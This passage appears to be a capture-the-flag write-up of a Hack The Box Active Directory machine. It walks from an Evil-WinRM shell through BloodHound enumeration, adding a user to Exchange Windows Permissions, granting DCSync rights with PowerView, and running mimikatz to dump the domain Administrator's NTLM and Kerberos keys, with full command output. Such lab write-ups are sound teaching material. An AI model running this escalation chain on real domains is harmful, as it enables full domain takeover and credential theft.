SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users> reg.exe query "HKLM\software\microsoft\windows nt\currentversion\winlogon"
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DisableBackButton REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x5ea4c0cd
ShutdownFlags REG_DWORD 0x80000033
DisableLockWorkstation REG_DWORD 0x0
DefaultDomainName REG_SZ HTB
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\AlternateShells
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\GPExtensions
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\VolatileUserMgrKey
*Evil-WinRM* PS C:\Users>
To better visualize the Domain, let's use bloodhound for the domain enumeration, this would help see the path, relation in a graphical view.
To use bloodhound, you need collectors, so I uplod sharphound as the collector, to collect domain info, since evil-winrm has upload and download feature.
Checking the user groups manually whoami /groups and with bloodhoud, I see that the user is part of Account Operators group, this means that the user can can create, modify, and delete most user accounts, groups, and computer objects within the domain
Bloodhound
Now it means with the current user permission, we can:
- Change user's group
- Add a user into a new group including self
- Create a new user
Now let's check the shortes way to domain admin on bloodhound
The Exchange Windows Permissions group became interesting. When I search for it on the web, this mean:
- Member of this group is granted WriteDACL access.
This means If we are part of this group we can grant ourself DCSync rights.
Remeber we are already in the group that allow us to add any user to any group Account Operators
So let's go ahead and add ourself to the Exchange Windows Permissions group, but first let's upload powerview.
Let's add our current user svc-alfresco to Exchange Windows Permissions group with the command below:
net group "Exchange Windows Permissions" svc-alfresco /add
Now let's grant ourself DCSync rights with the command below
Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "svc-alfresco" -Rights DCSync
Once the command above run successfully, let's move on to upload mimikatz on the target to perform secret dump. With mimikatz successfully uploaded to the host, let's run the command to dump Administrator hash.
.\mimikatz.exe 'lsadump::dcsync /domain:HTB.LOCAL /user:administrator' exit
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> .\mimikatz.exe 'lsadump::dcsync /domain:HTB.LOCAL /user:administrator' exit
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /domain:HTB.LOCAL /user:administrator
[DC] 'HTB.LOCAL' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
User Principal Name : Administrator@htb.local
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 8/30/2021 5:51:58 PM
Object Security ID : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID : 500
Credentials:
Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6
ntlm- 0: 32693b11e6aa90eb43d32c72a07ceea6
ntlm- 1: 9307ee5abf7791f3424d9d5148b20177
ntlm- 2: 32693b11e6aa90eb43d32c72a07ceea6
lm - 0: 9498c81fd53411e023fcd1ff4cd3e482
lm - 1: f505fe58b1dedbe3015454d212af5115
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : cad4a87763ba795c795b96486148bb95
* Primary:Kerberos-Newer-Keys *
Default Salt : HTB.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
aes128_hmac (4096) : b5880b186249a067a5f6b814a23ed375
des_cbc_md5 (4096) : c1e049c71f57343b
OldCredentials
aes256_hmac (4096) : 44f53d59845f6fc874991dadd99efa2513ed4f1d26762c2130cb6af13c39d90a
aes128_hmac (4096) : 08f52532321ad13ccb9f2dc613aac29d
des_cbc_md5 (4096) : 977a57459e191a98
* Primary:Kerberos *
Default Salt : HTB.LOCALAdministrator
Credentials
des_cbc_md5 : c1e049c71f57343b
OldCredentials
des_cbc_md5 : 977a57459e191a98
* Packages *
NTLM-Strong-NTOWF
mimikatz(commandline) # exit
Bye!
Yeeeeepee!!!! Our attack is successfull, we have Administrator hash now, let user evil_winrm
Game over!!!! We own the Domain Admin.
Top comments (0)